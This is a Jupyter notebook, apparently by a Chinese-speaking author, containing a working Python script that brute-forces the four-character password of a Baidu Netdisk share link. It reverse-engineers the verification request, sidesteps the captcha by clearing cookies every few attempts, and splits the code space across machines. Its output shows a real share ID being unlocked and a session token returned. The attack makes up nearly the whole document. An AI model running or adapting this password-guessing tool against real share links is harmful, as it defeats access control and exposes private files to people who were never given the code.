In [1]:
from requests import Session, Response
from requests_toolbelt.utils import dump
import base64
import time
from urllib.parse import urljoin
from pprint import pprint
from itertools import permutations


def parse_param_lines(s: str, separator=': ') -> dict:
    def kv(line):
        k, v = line.split(separator)
        return (k.strip(), v) # drop space of key
    return dict(kv(line) for line in s.splitlines() if line)

assert parse_param_lines("""a: 3
        b: 5""") == {"a": "3", "b": "5"}

def b64_encode(s: str) -> str:
    return base64.b64encode(s.encode("ascii")).decode("ascii")

assert b64_encode("B368A4CA85CCBF7F286652FDC4CBF7AB:FG=1") == "QjM2OEE0Q0E4NUNDQkY3RjI4NjY1MkZEQzRDQkY3QUI6Rkc9MQ=="

def get_timestamp_ms():
    return int(time.time() * 1000)
assert len(str(get_timestamp_ms())) == 13

class BaseSpider(Session):
    
    def __init__(self, base_url: str = None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
        }
        self.base_url = base_url
        
    def join_url(self, next_url: str):
        return urljoin(self.base_url, next_url)
        

In [2]:
class BaiduPanSpider(BaseSpider):
    
    def __init__(self, target_id: str, *args, **kwargs):
        super().__init__('https://pan.baidu.com', *args, **kwargs)
        self.target_id = target_id
        self.init_url = self.join_url(f"/share/init?surl={self.target_id}")
    
    def pre_post_verification(self):
        """
        【准备函数】
        
        由于三次请求以内不会触发验证码，因此可以将准备函数与请求函数分离，以进一步加快速度
        """
        self.cookies.clear()
        self.get(self.init_url)
#         pprint(self.cookies.get_dict())
        
    def post_verification(self, code: str):
        """
        【请求函数】
        
        code 是四位数，大小写不限，[0-9a-z]，总共 36^4 种可能
        """
        print(f">>>\ntrying code={code}")

        query = {
            # channel, web, app_id, bdstoken, clienttype 都可以固定，fields 应该可以不要
            "channel": "chunlei",
            "web": 1,
            "app_id": 250528,
            "bdstoken": "",
            "clienttype": 0, # 缺少会403
            
            # dp-logid 是基于一些信息拼接起来的（见上图），也可以固定，服务器没有做校验
            "dp-logid": 83575600200067350013,
            
            # logid 是 cookie 中 BAIDU_ID 的 base64 形式，直接构造
            "logid": b64_encode(self.cookies.get("BAIDUID")),
            
            # suid 是目标id，直接构造
            "surl": self.target_id,
            
            # t 是微秒时间戳，直接构造
            "t": get_timestamp_ms(),
        }

        data = {
            "pwd": code,
            "vcode": "",
            "vcode_str": ""
        }

        # 要加 Referer，否则报 2
        self.headers['Referer'] = self.init_url
        
        res = self.post(self.join_url('/share/verify'), params=query, data=data)
        
        if res.status_code != 200:
            print("Error!")
        else:
            pprint(res.json())

            errno = res.json()['errno']
            if errno == 0:
                print('成功！')
            elif errno == -12:
                print("验证码错误")
            elif errno == 2:
                print("漏了 Referer")
            else:
                print("其他验证码类型错误")

        print("<<<\n")
        return
                    

In [3]:
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyz'
CHARS_N = len(CHARSET)
CODE_SPACE_SIZE = CHARS_N ** 4


def gen_code(index=0, machines_n=1, machine_cur=0):
    def convert(num):
        result = ['0'] * 4
        for i in range(3, -1, -1):
            num, remainder = divmod(num, 36)
            result[i] = CHARSET[int(remainder)]
        return ''.join(result)

    start = CODE_SPACE_SIZE / machines_n * machine_cur + index
    return convert(start)

bdp_spider = BaiduPanSpider('TP_EEGShTgNwlieNrC89bA')

for i in range(3):           
    code = gen_code(i)
    bdp_spider.pre_post_verification()
    bdp_spider.post_verification(code)

bdp_spider.pre_post_verification()
bdp_spider.post_verification("zhuk")

>>>
trying code=0000
{'err_msg': '', 'errno': -9, 'request_id': 8653329481794196449}
其他验证码类型错误
<<<

>>>
trying code=0001
{'err_msg': '', 'errno': -9, 'request_id': 8653329608145071353}
其他验证码类型错误
<<<

>>>
trying code=0002
{'err_msg': '', 'errno': -9, 'request_id': 8653329774152023176}
其他验证码类型错误
<<<

>>>
trying code=zhuk
{'err_msg': '',
 'errno': 0,
 'randsk': 'kx%2FxdUsD0wXYtRhhm014gsAm4Y%2FnjLrMe7EOTVdMlIQ%3D',
 'request_id': 8653329923208940911}
成功！
<<<



## analysis

### sample data

```python
query = '''
t	1696139063798
surl	TP_EEGShTgNwlieNrC89bA
channel	chunlei
web	1
app_id	250528
bdstoken	
logid	QjM2OEE0Q0E4NUNDQkY3RjI4NjY1MkZEQzRDQkY3QUI6Rkc9MQ==
clienttype	0
dp-logid	83575600200067350013
'''

data = '''
pwd	aaaaa
vcode	
vcode_str	
'''

code_ok = {
	"errno": 0,
	"err_msg": "",
	"request_id": 8651924061006025916,
	"randsk": "kx%2FxdUsD0wXYtRhhm014gsAm4Y%2FnjLrMe7EOTVdMlIQ%3D"
}

code_wrong = {
	"errno": -12,
	"err_msg": "",
	"request_id": 8651874905547745422
}
```

### logid logic

![logid.jpg](assets/logid.jpg)